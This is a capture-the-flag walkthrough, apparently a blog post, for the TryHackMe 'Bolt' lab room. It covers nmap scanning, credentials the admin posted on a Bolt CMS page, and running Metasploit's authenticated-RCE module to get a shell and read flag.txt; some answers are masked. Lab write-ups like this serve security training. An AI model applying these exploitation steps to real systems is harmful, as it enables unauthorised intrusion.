The skills to be tested and needed to solve this room are: RCE, Metasploit, and just a keen eye.
This room was released today 8/12/2020, and I wanted to try if I can crack it. This is a super easy room. Perfect for anyone who wants to try ctf or hacking.
I also chose to mask part of the answers so you will have to do the steps and see how things work. I don’t want to take away this learning experience from you.
Shoutout to @0x9747 for creating the room. You can access the room at https://tryhackme.com/room/bolt
I was assigned an IP address of 10.10.40.194
There are 8 tasks to complete the room:
- What port number has the web server with a CMS running?
- What is the username we can find in the CMS?
- What is the password we can find for the username?
- What version of the CMS is installed on the server?
- B*** *.*.*
- There’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What is it’s EDB-ID?
- Metasploit recently added an exploit module for this vulnerability. What’s the full path for this exploit?
- Set the LHOST, LPORT, RHOSTS, USERNAME, PASSWORD in msfconsole
- No answer needed
- Look for the flag.txt inside the machine
- Deploy the machine
2. Scan the victim machine for any open ports and services using nmap. nmap -sC -sV -oA Desktop/TryHackMe/Bolt 10.10.40.194
- -sC – to scan using the default nmap scripts
- -sV – to pull version information of open ports found during the scan
- -oA Desktop/TryHackMe/Bolt – to save the results of the scan to a file named “bounty” and saved in three different formats (normal, XML, and grepable)
- There are 3 open ports, but let’s check both port 80 and 8*** respectively
- There is nothing to interesting with the page on port 80, it is just the default Apache welcome page.
- However, port 8*** is setup with Bolt CMS
3. Let’s look around the different pages and links and check if there are useful information we can use to exploit this web server. The following 2 screenshots contain information to exploit the CMS.
- I don’t know about you guys, but this Jake, the admin needs to be fired ASAP. I mean, who in their right mind would post their username and password on a publicly accessible page??? Good thing this is just for practice and for fun, lol.
4. Browse to https://www.exploit-db.com and search for bolt in the search field.
5. Open Metasploit. msfconsole
6. Type search bolt to look for the metasploit module that we can use to exploit the machine.
7. Type Use 1 to load the second module and use it, and type show options to check what parameters/settings need to be set up
8. Set up the following:
- set RHOSTS 10.10.40.194 – this is to set up the target machine using its IP address
- set LHOST 10.2.*.* – this is your attack machine’s IP address
- set USERNAME b*** – the username we found on the webpage
- set PASSWORD b**********3 – the password posted on the webpage
9. Type exploit or run to start the exploit against the CMS running on the target machine.
- Above, we can see that we are inside /home/bolt/public/files directory
10. Look for flag.txt. The flag is in the /home directory
Hope you enjoyed the walk-through. Please share and subscribe to my blog! Mahalos!